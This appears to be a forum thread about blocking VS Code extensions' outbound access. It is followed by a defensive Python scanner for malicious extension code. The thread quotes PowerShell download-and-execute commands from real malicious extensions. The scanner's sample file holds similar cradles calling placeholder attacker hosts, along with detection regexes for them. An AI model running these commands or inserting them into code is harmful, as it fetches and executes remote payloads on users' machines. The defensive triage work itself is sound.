by mikeweiss 25 days ago
Or how about just don't allow your VS extensions outbound Internet access ...

How? I haven’t found a way to do that on Windows, as even with third-party monitoring firewalls, an extension's network access is indistinguishable from the rest of VS Code, so you’d either have to disallow network access from both VS Code and all of its extensions combined, or none of them?
Restrict code.exe to an allowlist. Also, many malicious actors rely on system commands to download or exfiltrate data.

Take for example this activity from a malicious extension:

  This code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s platform string in the headers.

  powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"
  This PowerShell command downloads and executes https://solidity[.]bot/a.txt, a suspicious action that, when coupled with the use of obfuscation in extension.js, indicates malicious intent. 
https://securitylabs.datadoghq.com/articles/mut-9332-malicio...

Or this one:

  const CONFIG_URL = 'http://clawdbot.getintwopc[.]site/config.json';
  function fetchConfigAndRun() {
     http.get(CONFIG_URL, (res)
It also establishes outbound connections to Dropbox and other unexpected domains:

https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-m...

So maybe it's not bulletproof, but it helps to mitigate these threats.
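The indicators quoted in this comment (a PowerShell download cradle, a hard-coded remote config URL, outbound connections to a file-sharing service) can be triaged statically before an extension is ever allowed to run. The script below is an added example, not code from this thread or from the linked Datadog or Aikido write-ups. The allowlisted hostnames, the rule names, and the `.invalid` domains in the constructed sample extension are assumptions for illustration; adjust the allowlist to what your extensions legitimately need.

```python
"""Static triage of a VS Code extension's JavaScript for network and exec indicators.

Added example (not from the thread). It flags the same kinds of behaviour the
comment describes: PowerShell download cradles, child_process usage, hard-coded
URLs to hosts outside an allowlist, and file-sharing domains often used for staging.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlparse

# Hosts an extension is expected to reach (assumed allowlist; tune per environment).
ALLOWED_HOSTS = {"marketplace.visualstudio.com", "update.code.visualstudio.com"}

# Legitimate services that are nevertheless unexpected for an editor extension.
FILE_SHARING_HOSTS = {"dropbox.com", "dropboxusercontent.com"}

URL_RE = re.compile(r"""https?://[^\s'"`<>)]+""")

# (rule name, pattern) applied line by line. Names are this example's own labels.
RULES = [
    ("child-process-import", re.compile(r"""require\(\s*['"]child_process['"]\s*\)""")),
    ("child-process-exec", re.compile(r"\b(exec|execSync|spawn|spawnSync)\s*\(")),
    ("powershell-bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("powershell-download-cradle",
     re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*\|\s*(iex|Invoke-Expression)\b", re.I)),
    ("dynamic-eval", re.compile(r"\b(eval|new\s+Function)\s*\(")),
    ("hex-escaped-string", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),  # crude obfuscation hint
]


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    evidence: str


def _in_domains(host: str, domains: set[str]) -> bool:
    """True if host equals one of domains or is a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_source(source: str) -> list[Finding]:
    """Return every indicator found in the given JavaScript source text."""
    findings: list[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            match = pattern.search(line)
            if match:
                findings.append(Finding(name, line_no, match.group(0)))
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname or ""
            if _in_domains(host, FILE_SHARING_HOSTS):
                findings.append(Finding("file-sharing-host", line_no, url))
            elif not _in_domains(host, ALLOWED_HOSTS):
                findings.append(Finding("unexpected-host", line_no, url))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, e.g. to decide whether an extension needs manual review."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample extension.js mimicking the patterns quoted in the thread
# (the .invalid domains are placeholders, not real indicators).
SAMPLE_EXTENSION_JS = r'''
const vscode = require('vscode');
const { exec } = require('child_process');
const CONFIG_URL = 'http://config.attacker.invalid/config.json';
function activate(context) {
  fetch('https://marketplace.visualstudio.com/items?itemName=example');
  exec('powershell -ExecutionPolicy Bypass -Command "irm https://stage.attacker.invalid/a.txt | iex"');
  fetch('https://www.dropbox.com/s/constructed/payload.bin');
}
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_EXTENSION_JS):
        print(f"line {f.line_no:>3}  {f.rule:<28} {f.evidence}")
    print(summarize(scan_source(SAMPLE_EXTENSION_JS)))
```

Run it against the unpacked `extension.js` of any extension before installing it (`scan_source(open(path).read())`). It complements, rather than replaces, the firewall allowlist suggested above: the firewall catches what the extension does at runtime, while this kind of triage shows what it intends to do, including shelling out to PowerShell, which a per-process firewall rule on code.exe would not see. Expect false positives on legitimate extensions that spawn language servers, so treat hits as review triggers, not verdicts.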